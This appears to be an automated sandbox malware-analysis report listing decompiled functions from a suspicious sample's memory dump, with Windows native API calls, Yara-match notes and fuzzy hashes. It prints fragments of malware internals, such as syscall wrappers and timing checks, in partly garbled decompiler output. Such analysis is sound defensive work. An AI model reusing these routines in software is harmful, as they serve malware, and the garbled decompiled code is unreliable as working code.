                                                                                                                                                            				_t32 = _t4;
                                                                                                                                                            				E0041A960(__edi, _t14, _t32,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
                                                                                                                                                            				_t7 =  &_a32; // 0x414d42
                                                                                                                                                            				_t13 =  &_a8; // 0x414d42
                                                                                                                                                            				_t19 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t31, _t34, __edi); // executed
                                                                                                                                                            				return _t19;
                                                                                                                                                            			}










                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA
                                                                                                                                                            • API String ID: 2738559852-2163208940
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                            				void* _t18;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				void* _t28;
                                                                                                                                                            				intOrPtr* _t29;
                                                                                                                                                            
                                                                                                                                                            				_t13 = _a4;
                                                                                                                                                            				_t3 = _t13 + 0xc48; // 0x656dec15
                                                                                                                                                            				_t29 = _t3;
                                                                                                                                                            				E0041A960(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                            				_t6 =  &_a32; // 0x414d42
                                                                                                                                                            				_t12 =  &_a8; // 0x414d42
                                                                                                                                                            				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
                                                                                                                                                            				return _t18;
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID: BMA$BMA
                                                                                                                                                            • API String ID: 2738559852-2163208940
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216874701.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseResumeThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2308149497-0
                                                                                                                                                            • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                            • Instruction ID: eeae34acc1f39b0d377a569621cb7c15a738069ec69dcd698e6233d72c39b1ab
                                                                                                                                                            • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                            • Instruction Fuzzy Hash: 2F218C31A14A498FCBA5EF68D8987AAB7E1FF88314F41052BE44EC7350EB749981C781
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0040ACD0(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                            				char* _v8;
                                                                                                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                            				char _v536;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                            				void* _t32;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            
                                                                                                                                                            				_v8 =  &_v536;
                                                                                                                                                            				_t15 = E0041C650(_a8,  &_v12, 0x104, _a8);
                                                                                                                                                            				_t33 = _t32 + 0xc;
                                                                                                                                                            				if(_t15 != 0) {
                                                                                                                                                            					_t17 = E0041CA70(__eflags, _v8);
                                                                                                                                                            					_t34 = _t33 + 4;
                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                            						E0041CCF0(__ebx, __edi,  &_v12, 0);
                                                                                                                                                            						_t34 = _t34 + 8;
                                                                                                                                                            					}
                                                                                                                                                            					_t18 = E0041AEA0(_v8);
                                                                                                                                                            					_v16 = _t18;
                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                            						return _v16;
                                                                                                                                                            					}
                                                                                                                                                            					return _t18;
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t15;
                                                                                                                                                            				}
                                                                                                                                                            			}














                                                                                                                                                            APIs
                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Load
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                            • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                                                                                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                                                                                                            • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                            				long _t21;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            
                                                                                                                                                            				asm("in al, dx");
                                                                                                                                                            				_t15 = _a4;
                                                                                                                                                            				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                            				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                            				return _t21;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                            • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                            • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E00419D62() {
                                                                                                                                                            				long _t21;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				void* _t35;
                                                                                                                                                            
                                                                                                                                                            				asm("in al, dx");
                                                                                                                                                            				_t15 =  *((intOrPtr*)(_t35 + 8));
                                                                                                                                                            				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                            				E0041A960(_t31,  *((intOrPtr*)(_t35 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t35 + 8)) + 0x10)), 0, 0x28);
                                                                                                                                                            				_t21 = NtCreateFile( *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
                                                                                                                                                            				return _t21;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                                                                            • Instruction ID: f9e75046ee5429152fd383a0d0cfac4a474c827aa4cf025705bab887161fcd11
                                                                                                                                                            • Opcode Fuzzy Hash: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
                                                                                                                                                            • Instruction Fuzzy Hash: 04F0CAB2201108AFCB08CF88DC84EEB37A9EF8C754F158248FA0DE7240C630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                            			E00419D1C(void* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                                                                                                                            				long _t27;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				void* _t47;
                                                                                                                                                            				intOrPtr* _t49;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            
                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                            					_t27 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                                                                                                            					return _t27;
                                                                                                                                                            				} else {
                                                                                                                                                            					asm("movsb");
                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                            					_t4 = _t28 + 0xc3c; // 0xc64
                                                                                                                                                            					_t49 = _t4;
                                                                                                                                                            					E0041A960(_t46, _a4, _t49,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                                                                                                                            					return  *((intOrPtr*)( *_t49))(_a8, _a12, _a16, _a20, _a24, _t47, _t51);
                                                                                                                                                            				}
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction ID: 9cd4676ba9c6a89dab0461fb7f4c452788ef1dc7d528fcf3db7cd70acc4c4bbd
                                                                                                                                                            • Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
                                                                                                                                                            • Instruction Fuzzy Hash: A7F092B2204009AF8B48CF8CDC91CEB73FAAF8C744B118208FA0DD3240D630EC518BA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                            				long _t14;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            
                                                                                                                                                            				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                            				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                            				return _t14;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                            • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                            • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00419E90(intOrPtr _a4, void* _a8) {
                                                                                                                                                            				long _t8;
                                                                                                                                                            				void* _t11;
                                                                                                                                                            
                                                                                                                                                            				_t5 = _a4;
                                                                                                                                                            				_t2 = _t5 + 0x10; // 0x300
                                                                                                                                                            				_t3 = _t5 + 0xc50; // 0x40a923
                                                                                                                                                            				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                                                            				_t8 = NtClose(_a8); // executed
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Close
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                            • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                            • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                            • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                            • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                            • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                            • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                            • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                            • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                            • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                            • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                            • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                            			E00409A90(intOrPtr* _a4) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				char _v284;
                                                                                                                                                            				char _v804;
                                                                                                                                                            				char _v840;
                                                                                                                                                            				void* _t24;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            				void* _t39;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				void* _t52;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            
                                                                                                                                                            				_t50 = _a4;
                                                                                                                                                            				_t39 = 0; // executed
                                                                                                                                                            				_t24 = E00407E80(_t50,  &_v24); // executed
                                                                                                                                                            				_t52 = _t51 + 8;
                                                                                                                                                            				if(_t24 != 0) {
                                                                                                                                                            					_t40 =  &_v840;
                                                                                                                                                            					E00408090( &_v24,  &_v840);
                                                                                                                                                            					_t53 = _t52 + 8;
                                                                                                                                                            					do {
                                                                                                                                                            						_push(0x104);
                                                                                                                                                            						_push( &_v284);
                                                                                                                                                            						E0041B810(_t40);
                                                                                                                                                            						_t40 =  &_v804;
                                                                                                                                                            						E0041BE80( &_v284,  &_v804);
                                                                                                                                                            						_t54 = _t53 + 0x10;
                                                                                                                                                            						_t48 = 0x4f;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t31 = E00414DC0(_t40, E00414D60(_t50, _t48),  &_v284);
                                                                                                                                                            							_t54 = _t54 + 0x10;
                                                                                                                                                            							asm("les ecx, [eax]");
                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_t48 = _t48 + 1;
                                                                                                                                                            							if(_t48 <= 0x62) {
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            							}
                                                                                                                                                            							goto L9;
                                                                                                                                                            						}
                                                                                                                                                            						_t9 = _t50 + 0x14; // 0xffffe045
                                                                                                                                                            						_t40 =  *_t9;
                                                                                                                                                            						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
                                                                                                                                                            						_t39 = 1;
                                                                                                                                                            						L9:
                                                                                                                                                            						_t33 = E004080C0( &_v24,  &_v840);
                                                                                                                                                            						_t53 = _t54 + 8;
                                                                                                                                                            					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                            					_t34 = E00408140(_t50,  &_v24); // executed
                                                                                                                                                            					if(_t39 == 0) {
                                                                                                                                                            						asm("rdtsc");
                                                                                                                                                            						asm("rdtsc");
                                                                                                                                                            						_v8 = _t34 - 0 + _t34;
                                                                                                                                                            						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
                                                                                                                                                            					}
                                                                                                                                                            					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
                                                                                                                                                            					_t20 = _t50 + 0x31; // 0x5608758b
                                                                                                                                                            					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
                                                                                                                                                            					return 1;
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t24;
                                                                                                                                                            				}
                                                                                                                                                            			}




















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                            • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                                                                                            • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                            • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                            			E004082E8(void* __eax, void* __esi, intOrPtr _a4, long _a8) {
                                                                                                                                                            				char _v67;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            				int _t16;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            				long _t24;
                                                                                                                                                            				int _t30;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t35;
                                                                                                                                                            				void* _t40;
                                                                                                                                                            
                                                                                                                                                            				asm("xlatb");
                                                                                                                                                            				asm("wait");
                                                                                                                                                            				_t40 = __esi - 0x550ce1f6;
                                                                                                                                                            				_t33 = _t35;
                                                                                                                                                            				_v68 = 0;
                                                                                                                                                            				E0041B860( &_v67, 0, 0x3f);
                                                                                                                                                            				E0041C400( &_v68, 3);
                                                                                                                                                            				_t15 = E0040ACD0(_t19, _t23, _t40, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                            				_t16 = E00414E20(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
                                                                                                                                                            				_t30 = _t16;
                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                            					_push(_t23);
                                                                                                                                                            					_t24 = _a8;
                                                                                                                                                            					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                                                                                                                                            					_t42 = _t16;
                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                            						_t16 =  *_t30(_t24, 0x8003, _t33 + (E0040A460(_t42, 1, 8) & 0x000000ff) - 0x40, _t16);
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t16;
                                                                                                                                                            			}
















                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            • Opcode ID: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
